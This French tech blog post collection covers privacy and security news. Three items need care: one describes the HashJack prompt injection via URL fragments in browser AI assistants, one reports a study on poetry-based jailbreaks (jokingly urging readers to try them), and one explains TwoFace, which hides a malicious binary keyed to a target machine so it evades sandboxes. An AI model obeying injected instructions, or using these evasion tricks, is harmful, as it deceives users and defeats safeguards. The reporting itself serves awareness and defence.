Microsoft vient encore de frapper un grand coup à base de “on vous a pas demandé votre avis mais c’est activé par défaut”. En effet, la firme de Redmond déploie actuellement une fonctionnalité de reconnaissance faciale basée sur l’IA dans OneDrive. Jusque-là, rien de surprenant, Apple Photos et Google Photos font pareil depuis des lustres et c’est pratique car ça permet avec une simple recherche de retrouver dans votre photothèque toutes les photos d’une personne en particulier.

Sauf que Microsoft a décidé d’y ajouter une petite subtilité bien nulle…

Car oui, vous pouvez désactiver cette fonction, ouf ! Sauf que vous ne pouvez le faire que trois fois par an. 3 putain de fois par an ! Donc si vous désactivez, puis réactivez, puis désactivez à nouveau ce paramètre, vous êtes bloqué jusqu’à l’année suivante. Pour le moment, cette fonctionnalité est en test uniquement auprès des utilisateurs de la version Preview donc y’aura peut-être rétropédalage mais les testeurs sont pas jouasses.

Le pire c’est que Microsoft a la fâcheuse habitude de réinitialiser vos paramètres de confidentialité à chaque mise à jour majeure de Windows, donc si Redmond décide de réactiver l’option une quatrième fois dans l’année sans vous demander votre avis… Hé bien y’a de fortes chance que vous soyez coincé plus vite que prévu.

Alors pourquoi cette limitation débile ?

Et bien Microsoft n’a pas daigné donner d’explication officielle à nous pauvre gueux, mais les experts en dingueries de Redmond supposent que c’est lié au coût de suppression des données biométriques. En effet, quand vous désactivez la fonction, Microsoft s’engage à effacer toutes vos données de regroupement facial sous 30 jours et la réactiver ensuite nécessite de réanalyser toutes vos photos avec l’IA. Et ça, ça coûte un pognon de dingue en ressources serveur.

En gros, Microsoft veut éviter que des petits malins fassent du toggle en boucle et mettent leurs clusters GPU à genoux et leur tréso à sec. L’explication se tient c’est vrai, mais du point de vue utilisateur, c’est complètement absurde, surtout que comme d’hab, personne n’explique rien. Puis c’est quand même une fonctionnalité qui scanne les visages de votre famille, vos amis, vos enfants, et qui est activée par défaut sans votre consentement explicite, hein…

D’ailleurs, Thorin Klosowski de l’Electronic Frontier Foundation a réagi officiellement en expliquant que, je cite, “Toute fonctionnalité liée à la vie privée devrait vraiment être opt-in, et les entreprises devraient fournir une documentation claire pour que les utilisateurs comprennent les risques et les avantages avant de faire leur choix.”

Ça me semble parfaitement sain et logique… Espérons que Microsoft comprenne cela aussi. La firme assure que vos données biométriques ne sont pas utilisées pour entraîner leurs modèles IA globaux, et on va faire semblant de les croire, mais ça reste du stockage de données biométriques sur des serveurs tiers, activé par défaut, avec une capacité de contrôle artificiellement limitée.

Et comme vous le savez, ça s’inscrit dans une tendance plus large chez Microsoft où Word sauvegarde maintenant par défaut sur OneDrive plutôt qu’en local, où Notepad est connecté au cloud, où Paint tourne à l’IA…et j’en passe. Bref, tout est fait pour que vos données quittent votre machine et atterrissent sur les serveurs de M$.

Bref, si vous utilisez OneDrive et que vous tenez à votre vie privée, gardez bien en tête que vous n’avez droit qu’à trois changement par an donc, comme les 3 voeux du génie de la lampe, utilisez-les avec parcimonie, et priez pour que les mises à jour Windows n’aient pas la bonne idée de réactiver ce truc dans votre dos.

Source

Les chercheurs de Cato Networks viennent de publier leurs travaux sur une nouvelle technique d’attaque baptisée HashJack, et l’idée c’est d’exploiter les fragments d’URL, vous savez le petit # suivi d’un truc à la fin des adresses web, pour injecter des instructions malveillantes dans les assistants IA intégrés aux navigateurs.

En temps normal, tout ce qui se trouve après le # dans une URL ne quitte jamais votre navigateur et c’est utilisé pour naviguer vers une section précise d’une page web, et les serveurs web ne voient jamais cette partie. Du coup, les outils de sécurité réseau non plus. Et c’est justement là que ça devient vicieux…

Car les assistants IA comme Gemini dans Chrome, Copilot dans Edge ou Comet de Perplexity ont accès à l’intégralité de l’URL, fragment compris. Un attaquant peut donc crafter une URL d’apparence légitime avec des instructions cachées après le #, et quand vous demandez à votre assistant IA de vous aider avec cette page, il va gentiment exécuter les commandes planquées. Cato Networks décrit ça comme la première injection de prompt indirecte capable de transformer n’importe quel site légitime en vecteur d’attaque.

D’après les tests de l’équipe de Cato, les scénarios d’attaque possibles sont variés puisque ça va du phishing classique où l’assistant vous donne un faux numéro de téléphone à appeler, à l’exfiltration de données vers des serveurs contrôlés par l’attaquant. Y’a aussi la désinformation avec de fausses infos boursières ou médicales, ou encore des instructions détaillées pour installer des backdoors.

Bref, c’est le jackpot pour les attaquants.

Niveau compatibilité de l’attaque, les trois principaux touchés sont Gemini pour Chrome, Copilot pour Edge et Comet de Perplexity. Bonne nouvelle quand même, Claude pour Chrome et Atlas d’OpenAI ne sont pas vulnérables, puisqu’iils n’accèdent pas directement aux fragments d’URL.

Côté réponse des éditeurs, c’est un peu le grand écart puisque Perplexity a classé le problème comme critique et a appliqué un correctif, Microsoft a fait pareil pour Copilot fin octobre mais par contre, Google a décidé de classer ça comme un “comportement attendu” et a marqué le bug en “Won’t Fix”.

Argh !! Donc si vous utilisez Gemini dans Chrome, vous êtes toujours exposé les amis !

Après faut relativiser quand même car l’attaque nécessite plusieurs étapes d’interaction de la part de l’utilisateur. C’est pas juste cliquer sur un lien et hop vous êtes pwned. Il faut visiter la page vérolée ET demander à l’assistant IA d’interagir avec le contenu. Mais bon, vu que de plus en plus de gens utilisent ces assistants pour des tâches quotidiennes, le risque existe.

D’ailleurs, HashJack s’inscrit dans une tendance plus large. Brave a publié une étude montrant que l’injection de prompt indirecte est un défi systémique pour toute la catégorie des navigateurs boostés à l’IA et des techniques similaires ont été testées avec succès contre Atlas de ChatGPT et d’autres. Même le CISO d’OpenAI admet que, je cite “l’injection de prompt reste un problème de sécurité non résolu à la frontière de la recherche”.

Voilà, si vous utilisez un Navigateur IA, soyez vigilant sur les URLs bizarres qu’on vous envoie et si c’est Gemini dans Chrome, peut-être qu’il vaut mieux attendre que Google se décide à considérer ça comme un vrai problème de sécu… ces fous !

Source

Une grosse lacune de Signal sur iPhone c’est qu’il était impossible de sauvegarder proprement son historique de messages. Par exemple, si vous changiez de téléphone ou si vous deviez réinstaller l’app, pouf, tout disparaissait.

Hé bien maintenant c’est terminé puisqu’ils viennent de lancer les Secure Backups sur iOS avec la version 7.86.

Techniquement, rien de magique, c’est simplement une sauvegarde chiffrée de bout en bout de tous vos messages et médias, protégée par une clé de récupération de 64 caractères générée localement. Et comme cette clé n’est jamais partagée avec les serveurs de Signal, cela veut dire que personne (même pas Signal) ne peut lire ou restaurer vos données sans elle. Les fichiers médias sont même chiffrés deux fois et modifiés pour masquer leur taille. Bref, du costaud niveau sécu.

Maintenant côté pratique, y’a deux formules. La version gratuite vous permet de stocker jusqu’à 100 Mo de messages texte, plus les photos, vidéos et fichiers des 45 derniers jours. Et si ça vous suffit pas parce que vous êtes un salop de riche ^^, y’a une offre payante à 1,99$/mois qui débloque le stockage de tout votre historique de messages plus jusqu’à 100 Go de médias sans la limite des 45 jours.

C’est d’ailleurs la première fois que Signal propose un truc payant donc ça va encore whiner chez les radins, mais l’idée c’est de couvrir les coûts de stockage des gros fichiers médias sans passer par la pub ou la revente de données. Bref, c’est cohérent.

Maintenant, pour activer tout ça, c’est hyper simple ! Vous allez dans Réglages > Sauvegardes > Configurer > Activer les sauvegardes. Et voilà… L’app génèrera votre clé de récupération, vous choisissez votre formule, et c’est parti mon kiki.

Signal avait déjà lancé cette fonctionnalité sur Android en septembre dernier et pour la suite, ils prévoient d’étendre les sauvegardes sécurisées à l’application desktop et de permettre le transfert d’historique chiffré entre Android, iOS et desktop. Cool non ?

Bref, si vous utilisez Signal sur iPhone, mettez à jour et activez les sauvegardes parce que perdre des années de conversations et tous les contacts de votre cartel pour un changement de téléphone, c’est vraiment pas cool ^^.

Source

Vous vous souvenez de Chat Control ? Ce projet de règlement européen qui voulait scanner tous vos messages privés pour détecter des contenus pédocriminels ? J’en avais parlé à l’époque et je m’étais bien énervé dessus. Hé bien après plus de 3 ans de négociations, de votes ratés, de blocages par l’Allemagne , les Pays-Bas et l’Autriche… le Conseil de l’UE a enfin trouvé un accord.

Et devinez quoi ? Bah c’est du vent.

Le grand compromis trouvé ce 26 novembre c’est donc de rendre le scanning… (roulements de tambours)… volontaire ! Oui, oui, volontaire. Ainsi, au lieu d’obliger toutes les messageries à scanner vos conversations, on leur demande gentiment si elles veulent bien le faire et en parallèle, on prolonge indéfiniment l’exemption qui permet déjà aux plateformes de scanner volontairement sans violer les lois européennes sur la vie privée. Je rappelle quand même que exemption devait expirer en avril 2026… Hé bien là, elle devient permanente.

Alors oui, techniquement c’est moins pire que le projet initial, mais quand même 3 ans de réunions à se tripoter la nouille, à payer des salaires, à faire des notes de frais, à bailler aux corneilles et j’en passe, pour nous pondre un magnifique “Bon ben finalement on change rien, les entreprises font ce qu’elles veulent”, je trouve ça magistral !

Et le pire c’est que même ce compromis light fait tiquer les experts en vie privée car quelques jours avant l’accord, un groupe de scientifiques a envoyé une lettre ouverte prévenant que le texte “présente toujours des risques élevés pour la société” sans bénéfices clairs pour les enfants. Les associations de défense des droits numériques dénoncent en fait une ruse politique car le texte mentionne que seront bonnes “toutes les mesures appropriées d’atténuation des risques” ce qui est une formulation suffisamment vague pour permettre aux gouvernements de dire plus tard que le scanning est essentiel pour la sécurité.

D’ailleurs Signal avait prévenu que si le scanning devenait obligatoire, ils quitteraient le marché européen plutôt que de compromettre le chiffrement de leurs utilisateurs. Bon au final c’est pas arrivé, mais ça donne une idée de l’ambiance.

Voilà, maintenant le Conseil va négocier avec le Parlement européen et les trilogues (les négociations finales) sont prévus début 2026, donc on n’a pas fini d’en entendre parler.

Et voilà comment se passent 3 ans de cirque bureaucratique pour revenir au point de départ ^^.

Source

Bon, j’étais un petit peu occupé aujourd’hui parce que c’est mercredi et c’est le jour des enfants, mais je ne pouvais pas finir ma journée sans vous parler de cette histoire incroyable.

Si vous faites partie des gens qui utilisent des sites comme JSONFormatter ou CodeBeautify pour rendre votre JSON lisible ou reformater du code, et bien figurez-vous que des chercheurs en sécu viennent de découvrir que ces outils ont laissé fuiter des tonnes de données sensibles durant des années. Et quand je dis tonnes, c’est pas une figure de style puisque ce sont plus de 80 000 extraits de code contenant des credentials en clair qui ont fuité, soit plus de 5 Go de données.

En effet, les chercheurs de WatchTowr ont découvert que la fonction “Recent Links” de ces plateformes permettait d’accéder à tous les bouts de code collés par les utilisateurs. Les URLs suivaient un format prévisible, ce qui rendait le scraping automatique hyper fastoche pour n’importe qui, et c’est comme ça qu’on a découvert que JSONFormatter a exposé durant 5 ans de données les données de ses utilisateurs. Et du côté de CodeBeautify, ça a duré 1 an.

Les chercheurs ont mis la main sur des identifiants Active Directory, des identifiants de bases de données et services cloud, des clés privées de chiffrement, des tokens d’accès à des repos Git, des secrets de pipelines CI/CD, des clés de passerelles de paiement, des tokens API en pagaille, des enregistrements de sessions SSH, et même des données personnelles de type KYC. Bref, le jackpot pour un attaquant, quoi.

Et côté victimes, c’est un festival puisqu’on y retrouve des agences gouvernementales, des banques, des assurances, des boîtes d’aéronautique, des hôpitaux, des universités, des opérateurs télécom… et même une entreprise de cybersécurité. On a même retrouvé les credentials AWS d’une bourse internationale utilisés pour leur système Splunk, ainsi que des identifiants bancaires provenant de communications d’onboarding d’un MSSP (Managed Security Service Provider). C’est cocasse comme dirait Macron.

Et pour prouver que le problème était bien réel et exploitable, les chercheurs de WatchTowr ont utilisé un service appelé Canarytokens dont je vous ai déjà parlé. Ils ont implanté de faux identifiants AWS sur les plateformes et ont attendu de voir si quelqu’un y accédait…

Résultat, quelqu’un a tenté de les utiliser 48 heures après que les liens étaient censés avoir expiré, et 24 heures après leur suppression supposée. Les données restaient donc accessibles bien au-delà de ce que les utilisateurs pouvaient imaginer.

Et le pire dans tout ça c’est qu’au moment de la publication des articles, les liens “Recent Links” étaient toujours accessibles publiquement sur les deux plateformes. Bref, aucune correction n’a été déployée.

Donc, voilà, si vous avez utilisé ces outils par le passé et que vous y avez collé du code contenant des identifiants et autres clés API (même par inadvertance), c’est le moment de faire une petite rotation de vos secrets.

Et même si c’est une évidence, de manière générale, évitez de balancer du code sensible sur des outils en ligne dont vous ne maîtrisez pas la politique de conservation des données.

Source

Bonne nouvelle, les amis, Tor vient d’implémenter CGO (Counter Galois Onion) !

Si ça ne vous dit rien, c’est normal, moi non plus je ne connaissais pas, mais je vais tout vous expliquer !

Jusqu’à maintenant, le réseau Tor protégeait votre anonymat avec du chiffrement en oignon. Plusieurs couches de crypto, une par relais et ça marche bien… sauf qu’il existe une technique vicieuse qu’on appelle les attaques par tagging.

Le tagging c’est quand un attaquant modifie votre trafic chiffré à différents endroits du réseau (genre en ajoutant un marqueur invisible dans certains noeuds), puis il observe ce qui sort de l’autre côté pour vous tracer. C’est comme quand vous collez un traceur GPS dans votre voiture, sauf que là c’est des bits dans du trafic chiffré.

Et de son côté, CGO fait encore mieux que de bloquer cette attaque. En effet, il transforme chaque attaque en auto-sabotage ! Si quelqu’un modifie ne serait-ce qu’un seul bit de votre trafic chiffré, tout le message devient illisible. Et pas seulement ce message… tous les messages futurs de la session deviennent du bruit blanc irrécupérable.

Avec ça en place, l’attaquant se tire une balle dans le pied à chaque tentative.

Derrière ce système, il y a 4 cryptographes qui ont bossé très dur : Jean Paul Degabriele, Alessandro Melloni, Jean-Pierre Münch et Martijn Stam. Ils ont publié leur recherche cette année et ça a été implémenté dans Arti, la version Rust de Tor et l’implémentation C arrive bientôt.

Ce qui change tout, c’est le calcul risque/bénéfice pour les attaquants car avant, tenter de tracer quelqu’un avait peu de conséquences si ça échouait. Mais maintenant, tenter de tracer quelqu’un détruit définitivement votre capacité à surveiller cette personne. Et vous vous en doutez, les agences de surveillance détestent perdre leur accès… Elles préfèrent observer en silence plutôt que de tout casser dans une tentative maladroite. Du coup CGO les force à choisir. Soit rester invisibles, soit tout perdre.

Et puis il y a un autre aspect génial à cette techno, c’est le forward secrecy renforcé que ça engendre car à chaque message, CGO transforme les clés de chiffrement de façon irréversible. Même si un attaquant récupère vos clés actuelles, il ne peut pas déchiffrer les messages précédents car les clés précédentes ont été broyées et remplacées à chaque étape.

CGO remplace aussi l’ancien système d’authentification qui utilisait un digest de 4 bytes par un authenticateur de 16 bytes. C’est donc bien plus costaud et plus difficile à falsifier ainsi qu’à contourner.

Comme d’hab, Tor publie l’algorithme en open source donc vous pouvez vous plonger dans le code si ça vous amuse.

Cette implémentation de CGO est encore expérimentale pour le moment, mais une fois que cela aura été éprouvé par la communauté et testé pendant plusieurs mois, voire des années, ce sera déployé officiellement dans les futurs relais, puis dans les services onion de Tor.

Voilà donc comment Tor fait de chaque tentative de surveillance un auto-sabotage irréversible, et ça les amis, c’est un message qui devrait faire réfléchir pas mal de gens dans des bureaux sans fenêtres.

Source

Depuis quelques années, dès qu’un outil open source devient un peu vieux ou bancal, un dev Rust débarque et dit “Attendez mes petits poulets, je vais vous refaire ça au propre”. Ça a commencé avec les outils système comme ripgrep qui a remplacé grep, puis fd qui a ringardisé find, et maintenant ça arrive dans l’impression 3D.

Hé oui, MicroCAD est la preuve que même OpenSCAD, ce vénérable langage de modélisation paramétrique qui existe depuis 2010, n’échappe pas à cette mode de réécriture systématique en Rust.

OpenSCAD, tout le monde le connaît dans le monde des makers et de l’impression 3D car c’est un super IDE / langage qui permet de programmer ses modèles 3D plutôt que de les dessiner à la souris dans Blender. Vous écrivez quelques lignes de code pour générer un engrenage, une brique de Lego, ou n’importe quelle forme géométrique complexe, et en théorie, c’est génial, sauf qu’en pratique, la syntaxe a vachement vieilli, les performances sur les gros modèles sont bofs, et l’écosystème est un peu figé dans la pâté.

Bref, OpenSCAD a 15 ans maintenant, et ça se sent. (Un peu comme moi et mes 21 ans de Korben… Snif la poussière ^^)

C’est pourquoi une équipe de développeurs allemands a décidé de tout reprendre de zéro. Le projet s’appelle µcad (prononcez ça microcad), et c’est la même philosophie qu’OpenSCAD, mais avec une syntaxe moderne inspirée de Rust, avec évidemment de meilleures performances, et une architecture plus solide. Vous pouvez donc toujours composer des formes basiques pour créer des géométries complexes, faire des opérations booléennes, et exporter vos modèles en .STL pour l’impression 3D ou en SVG pour la découpe laser.

L’installation est hyper simple si vous avez Rust sur votre machine :

`cargo install microcad`

`microcad export ./examples/bricks/brick.µcad`

Voici un outil qui fait un carton chez les pros de la cybersécurité. Ça s’appelle CRXplorer et c’est votre compteur Geiger personnel pour les extensions Chrome. En gros, ça décompresse et analyse les fichiers .crx (les extensions Chrome) pour détecter les vulnérabilités, les permissions abusives, et les risques de confidentialité.

Vous lui donnez une extension à scanner, il inspecte le manifest.json, regarde quelles permissions sont demandées, vérifie les scripts inclus, et vous dit si ça pu ou si vous pouvez y aller tranquillou. Et c’est utile car ces dernières années, y’a eu pas mal d’extensions Chrome qui sont régulièrement retirée du store de Chrome parce qu’elles ont été identifiées comme volant des données sensibles.

Ça ne remplace pas votre bon sens et votre vigilance, mais au moins vous pouvez faire un audit de ce qui tourne déjà dans votre navigateur ou de ce que vous avez prévu d’installer !

Le projet a cartonné dans la communauté bug bounty, car les extensions Chrome sont devenues une mine d’or pour les chasseurs de vulnérabilités et avec des milliers d’extensions sur le Store et des développeurs parfois peu regardants sur la sécurité, il y a du boulot !

Voilà, si vous voulez savoir si vos extensions Chrome sont clean, passez-les au crible avec CRXplorer et si vous découvrez quelque chose de louche, désinstallez ça rapidement, parce que Google ne le fera pas pour vous.

Ah et au fait, n’oubliez pas d’installer Firefox , c’est mieux quand même !

Merci à Lorenper pour le partage !

Ces derniers jours, une info a pas mal circulé… Google activerait par défaut une option permettant à Gmail de lire vos mails pour entraîner Gemini, son IA. Plusieurs sites dont le mien ont relayé l’info, puisque c’est ce que nous a expliqué Malwarebytes … qui a depuis publié un rectificatif.

Alors qu’est-ce qu’il en est vraiment ? D’où vient la confusion ?

Google a récemment reformulé et déplacé certains paramètres liés aux “fonctionnalités intelligentes” de Gmail. Le problème, c’est que le nouveau wording est suffisamment vague pour prêter à confusion. Quand on voit “smart” ou “intelligent” en 2025, on pense direct à l’IA générative. Ajoutez à ça l’intégration de Gemini un peu partout dans les produits Google, plus un procès en cours en Californie qui accuse Google d’avoir donné accès à Gmail, Chat et Meet à Gemini sans consentement… et vous obtenez un joli cocktail de parano.

Alors que fait vraiment Gmail à vos message ?

Hé bien Gmail scanne bien vos emails, mais pour faire tourner ses propres fonctionnalités : le filtrage anti-spam, la catégorisation automatique (Principal, Promotions, Réseaux sociaux…), le Smart Compose qui suggère la fin de vos phrases, ou encore l’ajout automatique d’événements dans votre agenda. C’est comme ça que Gmail fonctionne depuis des années, et ce n’est pas la même chose que d’entraîner un modèle d’IA générative comme Gemini.

Google affirme d’ailleurs que ces paramètres sont opt-in (donc désactivés par défaut), même si l’expérience semble varier selon les utilisateurs.

Alors pourquoi désactiver quand même ces options ?

Hé bien même si vos mails ne servent pas à entraîner Gemini, vous pouvez légitimement vouloir limiter ce que Google analyse. Moins de données exploitées = moins de profilage. Voici comment faire.

Allez dans Gmail sur votre ordinateur. Cliquez sur l’icône engrenage en haut à droite, puis sur “Voir tous les paramètres”.

Scrollez jusqu’à la section “Fonctionnalités intelligentes et personnalisation” et décochez la case.

Ensuite, si vous utilisez Google Workspace, allez dans les paramètres correspondants et désactivez aussi “Fonctionnalités intelligentes dans Google Workspace” et “Fonctionnalités intelligentes dans d’autres produits Google”.

Et voilà !

Petit bémol, sans ces fonctionnalités, plus d’événements ajoutés automatiquement à l’agenda, plus de Smart Compose, plus de résumés automatiques. Bref, vous revenez à un Gmail plus basique, mais qui garde vos données un peu plus au chaud.

Bref, cette histoire est un bon rappel que quand une info semble trop “scandaleuse” pour être vraie, ça vaut le coup de creuser un peu avant de s’enflammer. Cela dit, vouloir limiter ce que Google sait de vous reste toujours une bonne idée !

Article initialement rédigé le 21 novembre 2025, puis édité le 24 novembre 2025, suite au correctif de MalwareBytes.

Hé bien les amis, on savait déjà que les LLM avaient quelques petites failles de sécurité, mais celle-là est quand même assez… poétique. En effet, des chercheurs de DEXAI et de l’Université Sapienza de Rome viennent de découvrir que reformuler une requête malveillante sous la forme d’un poème permet de contourner les sécurités dans plus de 90% des cas chez certains fournisseurs d’IA.

L’équipe a ainsi testé la robustesse de 25 modèles de langage provenant de 9 fournisseurs majeurs : Google, OpenAI, Anthropic, DeepSeek, Qwen, Mistral, Meta, xAI et Moonshot et ils ont pour cela converti 1 200 requêtes potentiellement dangereuses en vers et comparé les résultats avec les mêmes demandes mais en prose classique.

Et là surprise ! Le taux de succès des attaques passe de 8% en prose à 43% en formulation poétique. 5x plus de succès, c’est pas rien ! Je me suis demandé comment c’était possible et d’après le doc de recherche, c’est parce que les filtres de sécurité des LLM fonctionnent principalement par pattern-matching sur des formulations classiques.

Ainsi, quand vous demandez en prose comment fabriquer un truc dangereux, le modèle reconnaît la structure et refuse. Mais quand la même demande est enrobée de métaphores condensées, de rythme stylisé et de tournures narratives inhabituelles, les heuristiques de détection passent à côté.

En gros, les garde-fous sont entraînés à repérer des formes de surface mais pas l’intention sous-jacente, qui elle est nuisible. Voici le tableau. Plus c’est rouge plus le modèle est sensible à l’attaque par poème.

ASR c’est le taux de succès de l’attaque.

Bizarrement, les modèles plus petits refusent plus souvent que les gros. GPT-5-Nano (0% de taux de succès d’attaque) fait mieux que GPT-5 (10%)par exemple. Les chercheurs n’expliquent pas vraiment pourquoi, mais ça suggère que la taille du modèle n’est pas forcément synonyme de meilleure sécurité. C’est peut-être aussi parce que les gros modèles sont tellement doués pour comprendre le contexte qu’ils comprennent aussi mieux ce qu’on leur demande de faire, même quand c’est caché dans des alexandrins.

Au niveau des domaines testés, c’est l’injection de code et les attaques cyber qui passent le mieux avec 84% de réussite. Le contenu sexuel reste le plus résistant avec seulement 24% de taux de succès. Les autres domaines comme le CBRN (chimique, biologique, radiologique, nucléaire), la manipulation psychologique et la perte de contrôle se situent entre les deux…

Bon, après faut quand même nuancer un peu car l’étude se limite aux interactions single-turn (c’est à dire en une seule requête, sans réelle conversation), utilise un seul méta-prompt pour la conversion poétique, et n’a testé que l’anglais et l’italien. Les chercheurs reconnaissent aussi que leurs mesures sont conservatives, donc les vrais taux de succès sont probablement plus élevés. Mais cela n’enlève rien au fait que les implications sont quand même sérieuses.

Prochainement, l’équipe prévoit d’analyser précisément quels éléments poétiques provoquent cet effet (la métaphore ? le rythme ? la rime ?), d’étendre les tests à d’autres langues et d’autres styles, et de développer des méthodes d’évaluation plus robustes face à ces “variations linguistiques”.

Bref, si vous voulez que votre IA vous ponde des choses “non autorisées”, écrivez un joli sonnet, ça a plus de chance de passer ^^.

Source

C’est dégueulasse, j’ai pas d’autre mot.

La plateforme SecretDesires.ai, un service de chatbot érotique avec génération d’images par IA, a laissé fuiter dans la nature près de 2 millions de photos et vidéos dans des conteneurs Azure pas du tout sécurisés. Hé oui, n’importe qui pouvait y accéder via de simples fichiers XML contenant tous les liens vers les images, et ça ont le sait grâce à cette enquête de 404 Media .

Alors qu’est-ce qu’on trouve dans cette fuite ?

Hé bien sans surprise des photos de célébrités mais surtout des photos de parfaites inconnues. Des selfies pris dans des chambres, des photos de profil de réseaux sociaux, des photos de remise de diplôme universitaire et j’en passe. Certains fichiers contiennent même les noms complets des femmes photographiées donc autant vous dire que ça craint un max !

Alors pourquoi y’avait tout ça ? Et bien SecretDesires proposait une fonctionnalité de “face swapping” dans ses abonnements payants (entre 7,99 et 19,99 dollars par mois, les pervers ont les moyens), qui permettait en uploadant la photo d’une vraie personne, de “coller” son visage sur d’autres images et vidéos sexuellement explicites générées pour l’occasion. Un container “removed images” contenait environ 930 000 images, un autre baptisé “faceswap” en contenait +50 000, et un troisième nommé “live photos” (des shorts vidéos IA) en contenait +220 000 dont des vidéos montrant des personnes d’apparence trèèèès jeune…

Et les prompts visibles dans certains noms de fichiers sont encore plus flippants car certains “clients” de cette plateforme ont demandé clairement des images de mineures. Et bien sûr, même si SecretDesires interdisait ça dans ses CGU, rien n’était fait techniquement pour l’empêcher.

De plus, la plateforme mentait à ses clients !! Elle se vantait d’utiliser un chiffrement de bout en bout et des serveurs ultra-sécurisés, sauf que leurs conteneurs Azure étaient grands ouverts depuis des mois vu les dates des fichiers et absolument rien n’était chiffré.

Heureusement, environ une heure après que 404 Media ait contacté SecretDesires pour les prévenir de la faille, les fichiers ont été rendus inaccessibles.

Alors j’sais pas si certains d’entre vous se sont déjà amusés à créer des deepfakes sexuels d’autres personnes sans leur consentement, mais sachez que les conséquences pour les victimes sont souvent dévastatrices. Cela a un impact sur leur carrière, leur confiance en soi, et parfois leur sécurité physique… Et bien sûr cela fait de vous des agresseurs sexuels !

Donc arrêtez d’utiliser ces services de merde, utilisez votre cerveau, faites preuve d’empathie et bien sûr, comme toujours, force aux victimes !

Source

En 1983, le président américain de l’époque, Ronald Reagan a vu le film WarGames lors d’un séjour à Camp David et si vous ne l’avez pas vu, sachez que ce film raconte l’histoire d’un ado qui pirate accidentellement les systèmes de défense américains et manque de déclencher la Troisième Guerre mondiale. Et une semaine après la projection, Ronald a convoqué le Comité des chefs d’état-major interarmées pour leur poser cette simple question : “Est-ce que le scénario est techniquement possible ?”

Et la réponse a été, sans surprise été : “oui et c’est même bien pire”.

Alors 15 mois plus tard, Reagan signe la NSDD-145 , qui est la toute première directive présidentielle sur la cybersécurité. Dire que tout est parti d’un film de science-fiction… C’est dingue je trouve et cela illustre parfaitement ce qu’on trouve sur ce site baptisé Movies-for-hackers créé par k4m4. Il s’agit d’une archive “vivante” sur la façon dont Hollywood a façonné la culture tech / hacker durant ces 40 dernières années.

On y trouve donc des thrillers comme Hackers et Blackhat, de la SF comme Matrix et Her, des documentaires type Citizenfour, et même des séries comme Mr. Robot ou Black Mirror. Chaque entrée indique le titre, l’année, et la note IMDb.

C’est simple, clair et efficace. Maintenant si vous regardez chacun de ces films, vous verrez comment ils ont, pour pas mal d’entre eux, influencé fortement la réalité tech qu’ils prétendaient représenter.

Prenez par exemple The Social Network sorti en 2010. Avant ce film, le hacker classique c’était le mec en sweat noir à capuche dans un sous-sol. Mais après Fincher, c’est devenu le dev en hoodie gris qui crée des empires depuis son dortoir universitaire. Ce film a vraiment changé l’image du programmeur dans la tête des gens. Autre exemple, Her de Spike Jonze, sorti en 2013 raconte l’histoire d’un type qui tombe amoureux d’une intelligence artificielle dotée de personnalité et d’émotions. Le film remporte l’Oscar du meilleur scénario original et à l’époque, tout ça paraît totalement impossible. C’est de la science-fiction. Sauf que là, on est 10 ans plus tard, ChatGPT a débarqué et les gens développent maintenant des relations émotionnelles avec des chatbots.

Puis y’a Matrix aussi, sorti en 1999, et ça c’est un autre cas d’école. Le film popularise l’idée que notre réalité pourrait être une simulation. On pensait à l’époque que c’était juste du divertissement pseudo-philosophique, mais aujourd’hui, allez demander à Elon Musk, et à tous ceux qui parlent sérieusement de cette théorie où on serait tous dans une simulation…

The Island de Michael Bay sorti en 2005 est aussi l’un de mes films préférés. Le scénario tourne autour du clonage humain et du trafic d’organes. Scarlett Johansson y joue une clone destinée à être récoltée pour ses organes. En 2005, c’est totalement dystopique mais aujourd’hui, avec CRISPR et les débats sur l’édition génétique, toutes les questions éthiques soulevées par le film se retrouve dans l’actualité scientifique du monde réel.

Et je n’oublie pas non plus Mr. Robot lancé en 2015 qui mérite une mention spéciale. Tous les experts en sécurité informatique ont salué la série pour son réalisme technique, avec du vrai pentesting, des vraies vulnérabilités, des vraies techniques…etc. Et c’est aujourd’hui devenu un outil pédagogique pour toute une génération de pentesters.

Voilà, alors plutôt que de voir ce repo Github comme une simple liste de films à voir quand on aime la culture hacker, amusez-vous à raccrocher chacun d’entre eux avec le monde réel… WarGames et la cybersécurité gouvernementale, Hackers et la culture underground, Matrix et cette théorie de la simulation, Her et les relations humain-IA, The Social Network et la mythologie du fondateur tech…et j’en passe. Je pense que tous ces films ont vraiment façonné la manière dont nous pensons la tech. Cette boucle de rétroaction se poursuit car les dev actuel qui ont grandi en regardant ces films, créent aujourd’hui inconsciemment ce futur qu’ils ont vu à l’écran. Et ça c’est fou !

Bref, si vous cherchez de quoi occuper vos soirées et que vous voulez comprendre d’où vient la culture tech actuelle, Movies-for-hackers fait office de curriculum non-officiel où chaque film est une leçon d’histoire !

Merci à Lorenper pour l’info !

TwoFace est un outil développé par Synacktiv qui permet de créer des binaires Linux ayant 2 comportements bien distincts. Un comportement parfaitement inoffensif qui s’active dans 99% des cas et un comportement malveillant qui ne se déclenche que sur une machine ciblée spécifiquement pour l’occasion.

Comme ça, votre sandbox verra toujours la version “propre” parce qu’elle n’aura pas le bon UUID de partition.

D’après la doc de Synacktiv, voici comment ça fonctionne : Vous avez deux binaires en fait… Y’en a un qui est inoffensif et un autre malveillant. TwoFace les fusionne alors en un seul exécutable. Ainsi, au moment du build, le binaire malveillant est chiffré avec une clé dérivée depuis l’UUID des partitions disque de la machine cible. Cet UUID est unique, difficile à deviner, et stable dans le temps ce qui est parfait pour identifier une machine spécifique.

Ensuite au lancement, quand le binaire s’exécute, il extrait l’UUID du disque de la machine. Pour ce faire, il utilise HKDF (Hash-based Key Derivation Function) pour générer une clé de déchiffrement depuis cet UUID et tente de déchiffrer le binaire malveillant caché. Si le déchiffrement réussit (parce que l’UUID match), il exécute le binaire malveillant. Par contre, si ça échoue (parce que l’UUID ne correspond pas), il exécute le binaire inoffensif.

Le projet est écrit en Rust et c’est open source ! Et c’est une belle démo (PoC) d’un problème que tous ceux qui font de l’analyse de binaires ont. En effet, d’ordinaire, pour révéler le vrai comportement d’un malware on l’exécute dans une sandbox et on peut ainsi observer en toute sécurité ce qu’il fait, les fichiers qu’il crées, les connexions réseau qu’il établit etc…

Mais avec TwoFace ça casse cette façon de faire. Et c’est pareil pour les antivirus qui verront toujours la version inoffensive tant que l’UUID ne correspond pas.

